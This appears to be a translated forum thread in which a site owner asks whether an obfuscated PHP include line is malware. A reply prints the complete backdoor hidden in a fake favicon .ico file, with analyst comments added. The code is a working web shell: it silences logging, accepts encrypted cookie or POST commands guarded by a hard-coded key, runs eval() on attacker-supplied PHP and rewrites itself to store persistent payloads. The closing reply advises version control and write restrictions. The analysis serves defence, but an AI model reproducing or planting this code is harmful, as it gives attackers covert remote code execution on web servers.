Is this code a virus or not?
When decoded, this code refers to a favicon.ico file, but while disinfecting the site I deleted such files (which contained God knows what) as viruses.
<?php
// Injected loader stub. The paired /*72aa5*/ comments bracket the inserted
// statement; searching the site tree for the same marker may help locate
// other files that received the same injection.
/*72aa5*/
// "@" silences the warning PHP would raise if the target file is missing.
// The path is written with alternating \xNN escapes so that a plain-text
// search for "favicon" or ".ico" does not match this line. Decoded, it is an
// absolute filesystem path ending in
// netcat/modules/filemanager/favicon_5e2eff.ico - include executes whatever
// PHP that file contains regardless of its .ico extension.
@include "\x2fv\x61r\x2fw\x77w\x2fv\x61r\x6ea\x76a\x5fv\x79k\x73a\x72f\x2fd\x61t\x61/\x77w\x77/\x78n\x2d-\x2d-\x37s\x62a\x61b\x68c\x636\x65y\x616\x61t\x32k\x2ex\x6e-\x2dp\x31a\x69/\x6ee\x74c\x61t\x2fm\x6fd\x75l\x65s\x2ff\x69l\x65m\x61n\x61g\x65r\x2ff\x61v\x69c\x6fn\x5f5\x652\x65f\x66.\x69c\x6f";
/*72aa5*/
// Outputs the contents of a backup copy of the index page.
// NOTE(review): whether this line is part of the original file or of the
// injection cannot be told from here - compare against a clean copy.
echo file_get_contents('index.html.bak.bak');
Open this .ico file in a text editor: the malware is sitting there.
// Payload start-up: switch off every PHP error channel and the execution
// time limit. Each call is "@"-prefixed, so a host that forbids ini_set or
// set_time_limit does not produce a warning either. The effect for an
// investigator is that this script leaves nothing in the PHP error log;
// web-server access logs and file timestamps are the places to look instead.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
// Compatibility shims for very old PHP builds. Neither constant is referenced
// anywhere else in the visible listing.
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
// Run-once guard: the constant is defined on first execution, so a second
// include of this file in the same request skips the whole body. The
// constant name is a fixed string and therefore a usable search indicator
// when sweeping a site for copies of this sample.
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
// Filled in further down from the request (cookie or POST field).
$data = NULL;
$data_key = NULL;
// Hard-coded token. It is used twice below: as the second XOR key in
// cs_decrypt()/cs_encrypt(), and as the value the request's 'ak' field must
// equal before any command is accepted.
$GLOBALS['cs_auth'] = '58d0af46-4572-4890-a372-475116d44415';
// At file scope this statement matters only when the file is included from
// inside a function, where it binds the local name to the global.
global $cs_auth;
// Hand-written base64 decoder.
// Returns "" for inputs shorter than four characters; otherwise strips every
// character outside the base64 alphabet and decodes four characters at a time
// into up to three bytes.
// NOTE(review): the built-in base64_decode() is never called in this listing,
// presumably so that scanners keyed on that function name do not match -
// treat a private base64 routine next to eval() as a review signal.
function cs_base64_decode($input) {
if (strlen($input) < 4)
{
return "";
}
// Alphabet plus "=" at index 64; array_flip turns it into char => index.
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$keys = str_split($keyStr);
$keys = array_flip($keys);
$i = 0;
$output = "";
$input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);
do {
// Four 6-bit indexes are read per iteration. Input whose cleaned length is
// not a multiple of four reads past the end of the string here.
$enc1 = $keys[$input[$i++]];
$enc2 = $keys[$input[$i++]];
$enc3 = $keys[$input[$i++]];
$enc4 = $keys[$input[$i++]];
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr($chr1);
// Index 64 is the "=" padding character: the corresponding byte is dropped.
if ($enc3 != 64) {
$output = $output . chr($chr2);
}
if ($enc4 != 64) {
$output = $output . chr($chr3);
}
} while ($i < strlen($input));
return $output;
}
// Fallback definition used only when the runtime has no file_put_contents().
// Writes $d to file $n and returns the number of bytes written, or 0 when the
// file cannot be opened.
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
// 8 is the numeric value of FILE_APPEND; anything else truncates the file.
$mode = $flag == 8 ? 'a' : 'w';
// "@" hides the warning raised when the path is not writable.
$f = @fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
// Arrays are concatenated before writing.
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
// Fallback definition used only when the runtime has no file_get_contents().
// Reads the whole file named by $filename and returns its contents.
// Unlike the write fallback, the fopen() result is not checked here.
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
// Returns the path of the file this code lives in: __FILE__ with everything
// from the first "(" to the end removed, then trimmed.
// NOTE(review): presumably this strips the "(N) : eval()'d code" suffix PHP
// appends to __FILE__ when code runs under eval - confirm.
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
// Repeating-key XOR: each byte of $data is XORed with the byte of $key at the
// same position, the key wrapping around when it is shorter than the data.
// The operation is its own inverse, so the same function encodes and decodes.
// This is obfuscation rather than encryption: with a copy of this file (and
// therefore the embedded token) an analyst can decode captured values.
// NOTE(review): with an empty $key and non-empty $data the inner loop never
// advances $i, so the outer loop does not terminate.
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
// Decodes $data with two XOR passes: first with the caller-supplied $key,
// then with the hard-coded global token $cs_auth.
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
// Encodes $data with the same two XOR passes as cs_decrypt(), applied in the
// opposite order ($cs_auth first, then $key). Because XOR passes commute, the
// result is the same transform as cs_decrypt().
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
// Loads the stored "plugin" table from this file's own contents.
// The table is kept after a marker equal to md5(<path of this file>); the text
// following the marker is URL-decoded, XOR-decoded with that same md5 as key,
// and unserialized. Returns an empty array when the marker is absent.
// For triage: a long URL-encoded blob after a 32-hex-character marker at the
// end of a PHP file is where this sample keeps additional code.
function cs_get_plugin_config()
{
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
// 32 = length of the hex md5 marker; everything after it is the blob.
$config = substr($self_content, $config_pos + 32);
// "@" hides unserialize failures; in that case $plugins is false, not an array.
$plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
// Persists the plugin table by rewriting this file on disk.
// The table is serialized, XOR-encoded with md5(<path of this file>) as key
// and URL-encoded. If the md5 marker already exists in the file, the old blob
// is replaced; otherwise "\n\n//" + marker + blob is appended, so the stored
// data sits on a PHP comment line.
// Consequences a defender can rely on: the file's size, hash and mtime change
// whenever the table is modified, and the write only succeeds if the
// web-server account has write permission on the file.
function cs_set_plugin_config($plugins)
{
$config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
// Failure to write is silenced by "@" and not reported to the caller.
@file_put_contents(cs_get_current_filepath(), $self_content);
}
// Stores a new entry in the plugin table under $name. The value is the
// base64-decoded form of $base64_data; the table is then written back into
// this file by cs_set_plugin_config().
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = cs_base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
// Removes the entry called $name from the plugin table and writes the table
// back into this file.
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
// Executes stored plugin entries with eval().
// With a $name, only the first entry whose key equals $name is run; with no
// argument every stored entry is run in table order. Each entry's content is
// passed to eval() as PHP source, so whatever was written into the table
// executes with the privileges of the web application.
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
// Request handling. The loops overwrite $data on every iteration, so the
// LAST cookie of the request is used (its name becomes $data_key); only when
// that leaves $data empty is the last POST field used instead.
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
// The value is base64-decoded, XOR-decoded (field name, then $cs_auth) and
// unserialized. Ordinary visitor traffic fails to unserialize, $data becomes
// false and the authenticated branch below is skipped.
$data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));
// Gate: the decoded array must carry the hard-coded token in 'ak'
// (compared with loose ==).
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
// 'a' selects the action.
if ($data['a'] == 'i')
{
// 'i': report the PHP version, the fixed string '2.0-1' and the token,
// serialized, then stop the request.
$i = Array(
'pv' => @phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo @serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
// 'e': the 'd' field is executed as PHP source.
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
// 'plugin': 'sa' chooses add or rem; both rewrite this file on disk.
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
// The token is echoed and the request ends, so the including page never
// renders. A response body consisting only of this token is a network-side
// indicator for this sample.
echo $data['ak'];
exit();
}
// Reached on every request that did not pass the gate: all stored plugin
// entries are executed before the including page continues. Removing only the
// include stub or only this file is therefore not sufficient - both, and the
// appended blob, have to go.
cs_plugin_load();
}
omg! Just put the site's source code under a version control system, and you will be able to check for and roll back all foreign changes with one command!
And if you also forbid the web server from writing to any folder except the ones you have personally allowed, you will never need to ask such a stupid question at all.